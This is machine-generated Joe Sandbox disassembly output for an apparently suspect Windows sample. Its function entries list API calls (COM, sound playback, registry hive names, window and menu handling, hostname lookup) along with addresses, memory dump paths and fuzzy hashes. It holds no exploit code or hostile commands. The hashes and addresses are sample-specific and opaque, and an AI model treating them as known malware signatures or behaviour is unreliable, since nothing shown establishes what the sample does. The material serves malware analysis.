                                                                              • CoInitialize.OLE32(00000000), ref: 00478904
                                                                              • CoUninitialize.OLE32 ref: 0047890E
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                              • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                              • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID: ,,I
                                                                              • API String ID: 2395222682-4163367948
                                                                              • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                              • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                              • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                              • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                              Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 3964851224-909552448
                                                                              • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                              • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                              • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                              • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                              Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_memmove
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 2279737902-1007645807
                                                                              • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                              • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                              • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                              • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                              Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 208665112-3771769585
                                                                              • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                              • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                              • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                              • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                              Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 00464F7A
                                                                                • Part of subcall function 0042049F: timeGetTime.WINMM(?,76C1B400,00410E7B), ref: 004204A3
                                                                              • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                              • SetActiveWindow.USER32 ref: 0046500B
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                              • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                              • IsWindow.USER32 ref: 0046504F
                                                                              • EndDialog.USER32(00000000), ref: 00465060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                              • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                              • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                              • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                              Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                              • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                              • _memset.LIBCMT ref: 0046D7E1
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                              • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                                                              • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                              • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                                                              Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                              • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                              • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                              • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                              • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                              Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                              • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                              • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                              • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                              • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                              • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                              Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                              • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                              • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                              • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                              Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                              • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                              • _wcscpy.LIBCMT ref: 0046A9FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                              • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                              • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                              • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                              Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048716A
                                                                              • CreateMenu.USER32 ref: 00487185
                                                                              • SetMenu.USER32(?,00000000), ref: 00487194
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                              • IsMenu.USER32(?), ref: 00487237
                                                                              • CreatePopupMenu.USER32 ref: 00487241
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                              • DrawMenuBar.USER32 ref: 00487276
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0$F
                                                                              • API String ID: 176399719-3044882817
                                                                              • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                              • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                              • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                              • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                              Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                              • DeleteDC.GDI32(00000000), ref: 00487594
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                              • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                              • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                                              • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                              Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00426E3E
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
